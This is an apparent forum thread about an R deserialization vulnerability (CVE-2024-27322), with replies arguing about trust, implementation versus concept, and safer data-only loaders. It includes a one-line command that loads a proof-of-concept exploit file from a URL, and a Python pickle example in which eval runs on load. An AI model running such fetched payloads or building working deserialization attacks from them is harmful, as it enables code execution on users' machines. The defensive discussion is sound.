by nomilk 764 days ago
> We reject the idea that there are wider security implications associated with promises or serialization, both of which are core features of the language.

Isn't this demonstrably false? I.e. run this [1]

load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))

and it opens the calculator application on Windows/macOS (or echoes 'pwnd' on Linux).

When someone can easily cause their hidden system code to run on my computer, that's a pretty serious vulnerability. read.csv() and fromJSON() do not allow this.

I happen to have packages on CRAN that readRDS() from AWS S3. So if I happen to be evil and make some trivial alterations to those RDS files to contain a hidden payload, well, it's child's play. That does not seem sane to me.

FWIW, my recommendation is to create a function like readRDS() that only reads data (and does not allow any extra code to be run), then use that in place of the traditional readRDS() on CRAN. Then if someone did craft a malicious payload, it wouldn't matter. The (harder) alternative would be to disallow any functions that have this remote code execution 'feature', e.g. only read.csv() or fromJSON() and similar.
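For what a "reads data only" loader can look like, here is a minimal sketch in Python rather than R, using the `find_class` hook that the pickle documentation describes for restricting globals. The names `DataOnlyUnpickler`, `load_data_only` and `Payload` are hypothetical, the payload is deliberately harmless, and this is an analogy to the readRDS() idea, not a description of how R would implement it.

```python
import io
import pickle


class DataOnlyUnpickler(pickle.Unpickler):
    """Hypothetical loader that refuses every global lookup."""

    def find_class(self, module, name):
        # Class and function references in the stream are resolved here,
        # so rejecting all of them leaves only plain containers and scalars.
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")


def load_data_only(blob):
    """Deserialize bytes, allowing plain data only (illustrative helper)."""
    return DataOnlyUnpickler(io.BytesIO(blob)).load()


class Payload:
    """Harmless stand-in for a crafted object."""

    def __reduce__(self):
        # On a normal load, pickle would call eval("6 * 7").
        return (eval, ("6 * 7",))


# Plain data round-trips as usual.
plain = load_data_only(pickle.dumps({"x": [1, 2, 3], "label": "ok"}))

# The crafted object is rejected before its callable can run.
try:
    load_data_only(pickle.dumps(Payload()))
    blocked = False
except pickle.UnpicklingError:
    blocked = True
```

The trade-off is that anything beyond plain containers and scalars no longer loads, which is roughly the price of treating a serialized file as data rather than code.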

[1] https://rud.is/b/2024/05/03/cve-2024-27322-should-never-have...

4 comments

It's hard not to read the quote you give as basically admitting that they _can't_ entertain the idea that there are "wider security implications" because that would be tacitly admitting that the language itself is built on shaky foundations. Something being a "core feature" _increases_ the scope of any security implications, but it also makes it a lot harder to fix without having to change fundamental parts of the language, and it sounds like that would be a non-starter for them.
Edit: apparently "load" is used to deserialize data. Yeah, this is bad, never mind. I guess treat data stored in this format as code (effectively: don't use this format) unless it can be guaranteed safe.

I'm not an R programmer, but aren't you downloading a file from the Internet and executing it?

You could do the same thing with python/JavaScript/lua. Heck, you could do it with C - download, compile and then dynamically link.

If you want security don't download files from the internet and execute them.

> aren't you downloading a file from the Internet and executing it?

Downloading, yes, executing, no, or at least not to 99% of R users’ knowledge prior to this recent occurrence.

A malicious user can't smuggle executable code into a csv or json file. But with an RDS file it's trivial.

I feel very uncomfortable about asking anyone to trust my code that much, even colleagues or friends, and I definitely don’t feel comfortable trusting theirs.

Their data files on the other hand are fine, I’ll gladly read their csv or json file. (would also be glad for their RDS if there’s a way to read it without also allowing for remote code execution)

I thought that deserializing language-specific serialization formats has always been dangerous.

Python: https://docs.python.org/3/library/pickle.html

Ruby: CVE-2013-0156

I'm sure there are more.

If you're using a serialized format, you get serialized risks.
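To make the pickle case concrete, here is a minimal sketch (Python, not R) of a serialized object running a callable at load time, next to JSON, which does not. The `Payload` class is a hypothetical stand-in and the evaluated expression is deliberately harmless.

```python
import json
import pickle


class Payload:
    """Hypothetical stand-in for a malicious object; the expression is harmless."""

    def __reduce__(self):
        # pickle stores this (callable, args) pair and calls
        # callable(*args) when the bytes are loaded.
        return (eval, ("6 * 7",))


blob = pickle.dumps(Payload())

# Loading runs eval("6 * 7"); the caller gets back 42, not a Payload.
result = pickle.loads(blob)

# By default json.loads only builds dicts, lists, strings, numbers,
# booleans and None, so the same text stays an inert string.
parsed = json.loads('{"expr": "6 * 7"}')
```

Nothing in the `pickle.loads(blob)` call looks like "execute this", which is the same surprise people are describing with load() and readRDS().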

Is it really execution by design? The docs don't suggest that:

>Description

>Reload datasets written with the function save.

> We reject the idea that there are wider security implications associated with promises or serialization, both of which are core features of the language. Isn't this demonstrably false? I.e. run this [1]

>> This does not prove that the concepts of promises and/or serialization are inherently unsafe core features. It simply shows there are some implementation issues to address. You go on to talk about these implementation issues, which is helpful and good, but it does nothing to prove the unsafeness or unsoundness of the concepts of promises or serialization/deserialization etc.

How many languages have had and fixed such bugs? Are those languages unsafe/insane, or were their implementations simply buggy?

In practice the difference barely exists, since we use language implementations, not their ideal conceptual forms, but I do think it's unfair to claim that an exploit of a language implementation makes the concepts within the language inherently exploitable.

I might be missing something, but it seems there are two different streams being crossed? (You do make good points about implementation imho, nothing wrong there ofc! :))

Part of this comes down to trust, and to who makes trust decisions and where.

If I read the project's statement right, they think you should only load what you already trust.

The problem is that many people load things they just found on the Internet, much like running `curl | bash` on random scripts they come across.

Note, if it's not obvious, running `curl | bash` on scripts from the Internet is just as insecure as the current R implementation.